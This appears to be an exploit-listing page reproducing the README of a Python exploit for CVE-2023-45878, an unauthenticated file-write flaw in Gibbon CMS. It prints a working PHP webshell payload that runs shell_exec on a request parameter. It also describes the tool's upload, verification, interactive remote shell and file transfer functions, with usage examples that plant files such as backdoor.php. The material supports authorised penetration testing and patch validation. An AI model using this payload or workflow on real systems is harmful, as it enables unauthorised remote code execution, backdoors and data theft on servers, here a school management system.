Exploit for Out-of-bounds Write in Gibbonedu Gibbon CVE-2023-45878

Name: Exploit for Out-of-bounds Write in Gibbonedu Gibbon CVE-2023-45878
Rating: 5 (132 reviews)
2025-04-13 | CVSS 9.8
## https://sploitus.com/exploit?id=143A14ED-AD79-5FF6-9262-9DE5FB55B4BB
# Gibbon CMS (CVE-2023-45878) Exploit

This Python script exploits CVE-2023-45878, an unauthenticated arbitrary file upload vulnerability in Gibbon CMS versions 25.0.1 and before, leading to Remote Code Execution (RCE).

## Vulnerability Description

CVE-2023-45878 exists in the `rubrics_visualise_saveAjax.php` endpoint of Gibbon CMS. This endpoint is vulnerable because it does not require authentication and allows arbitrary file writes.

The vulnerability arises from the following:

*   **Unauthenticated Access:** The `modules/Rubrics/rubrics_visualise_saveAjax.php` endpoint is accessible without any authentication.
*   **Arbitrary File Write:** The endpoint accepts `img`, `path`, and `gibbonPersonID` POST parameters.
    *   The `img` parameter is expected to contain specially formatted data, where the part after a comma is a base64 encoded string.
    *   The `path` parameter, if provided, is used as the destination filename for the uploaded file, relative to the Gibbon installation directory.
    *   The script decodes the base64 encoded content from the `img` parameter and writes it to a file specified by the `path` parameter.
*   **Remote Code Execution:** By crafting a malicious `img` parameter containing base64 encoded PHP code (e.g., `<?php echo "{VERIFY_TAG}"; if(isset($_GET["cmd"])) {echo @shell_exec($_GET["cmd"]);} ?>`) and specifying a `path` that results in a `.php` file accessible via the web server, an attacker can upload a PHP webshell and achieve Remote Code Execution on the vulnerable server.

## Script Functionality

This Python script automates the exploitation of CVE-2023-45878. It performs the following actions:

1.  **PHP Webshell Upload:** It crafts a malicious POST request to `modules/Rubrics/rubrics_visualise_saveAjax.php` to upload a PHP webshell. The webshell payload is `<?php echo "{VERIFY_TAG}"; if(isset($_GET["cmd"])) {echo @shell_exec($_GET["cmd"]);} ?>`, where `{VERIFY_TAG}` is a customizable tag. The payload is base64 encoded and sent within the `img` parameter.
2.  **Shell Verification:** It can verify if the uploaded shell is accessible and functional by sending a GET request with a simple command (e.g., `cmd=echo`) and checking for the `VERIFY_TAG` in the response. It also performs a pre-check for an existing shell if options like `--verify` or `--interactive` are used.
3.  **Interactive Shell Mode:** If the shell is uploaded and verified (or found during a pre-check), the script can enter an interactive mode. This mode features:
    *   Detection of the remote operating system (Windows/Linux) to tailor commands.
    *   A dynamic prompt displaying the current user, hostname, and remote working directory (e.g., `user@host:cwd$`).
    *   Built-in handling for the `cd` command to change the remote working directory.
    *   Special client-side commands:
        *   `!help`: Displays help for interactive commands.
        *   `!upload <local_path> [remote_path]`: Uploads a local file to the target server through the webshell.
        *   `!download <remote_path> [local_path]`: Downloads a file from the target server.
        *   `!lcd <path>`: Changes the local current working directory.
        *   `!ldir [path]`: Lists files and directories in the local current working directory or specified path.
    *   Uses the `prompt_toolkit` library if available for an enhanced command-line experience (history, better editing), otherwise falls back to Python's built-in `input()`.
4. **File Operations:** The interactive `!upload` command reuses the vulnerable endpoint to write arbitrary files, while `!download` uses system commands executed via the webshell (like `base64` or PowerShell's `[Convert]::ToBase64String`) to retrieve file content. 

## Usage

```bash
python3 exploit.py <target_url> [options]
```

**Arguments:**

*   `target_url`: The base URL of the target Gibbon CMS instance. The script will prepend `http://` if no scheme is provided and ensure a trailing slash (e.g., `http://example.com/gibbon` or `example.com/gibbon`).

**Options:**

*   `-s <shell_path>`, `--shell-path <shell_path>`:
    Specify the desired path and filename for the uploaded shell (e.g., `shell.php`, `uploads/shell.php`).
    If omitted, a random 8-character filename with a `.php` extension will be generated in the Gibbon base directory.
    Warning: Ensure the specified path is writable by the web server and accessible via the web.
*   `-v`, `--verify`:
    After attempting to upload the shell, verify if it is working. This option also triggers a pre-check to see if a shell with the specified name and tag already exists; if so, upload is skipped.
*   `-i`, `--interactive`:
    Enter interactive shell mode. If the shell is not already present (verified by a pre-check), it will be uploaded and verified first.
*   `-t <tag>`, `--tag <tag>`:
    Specify a custom static tag used in the webshell payload for verification purposes. (Default: `ExploitGibbon`).
*   `--timeout <timeout>`:
    Set the HTTP request timeout in seconds. (Default: 20).

**Examples:**

*   Basic exploit with random shell name in the main Gibbon directory and default tag:
    ```bash
    python3 exploit.py http://target.com/gibbon/
    ```

*   Exploit, specify shell filename `my_shell.php` in the main Gibbon directory and default tag:
    ```bash
    python3 exploit.py http://target.com/gibbon/ -s my_shell.php
    ```

*   Exploit, upload shell filename `backdoor.php` to `uploads/`, verify it, and use a custom tag:
    ```bash
    python3 exploit.py http://target.com/gibbon/ -s uploads/backdoor.php -v -t MySecretTag123
    ```

*   Exploit, upload shell, and enter interactive mode with default tag and a 30-second timeout:
    ```bash
    python3 exploit.py http://target.com/gibbon/ -s shell.php -i --timeout 30
    ```

*   Enter interactive mode with an existing shell (script will pre-check its existence):
    ```bash
    python3 exploit.py http://target.com/gibbon/ -s shell.php -t ExploitGibbon -i
    ```

*   Only verify if a shell named `existing_shell.php` with the default tag is active (will attempt upload if not found):
    ```bash
    python3 exploit.py http://target.com/gibbon/ -s existing_shell.php -v
    ```

## Requirements

*   **Python 3.7+** (due to f-strings, type hinting, `dataclasses`, `pathlib` usage)
*   `requests` library: Install using `pip install requests`
*   `rich` library: Install using `pip install rich`
*   `prompt_toolkit` library (optional, for enhanced interactive mode): Install using `pip install prompt_toolkit`

## Disclaimer

This script is provided for educational and security testing purposes only. Use it at your own risk and only against systems you have explicit permission to test. The author is not responsible for any misuse or damage caused by this script. Exploiting vulnerabilities without authorization is illegal and unethical.

## References

*   [CVE-2023-45878 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
*   [Herolab Security Advisory USD-2023-0025](https://herolab.usd.de/security-advisories/usd-2023-0025)
*   [GibbonEdu Core Source (rubrics_visualise_saveAjax.php affected version v25.0.01)](https://github.com/GibbonEdu/core/blob/v25.0.01/modules/Rubrics/rubrics_visualise_saveAjax.php)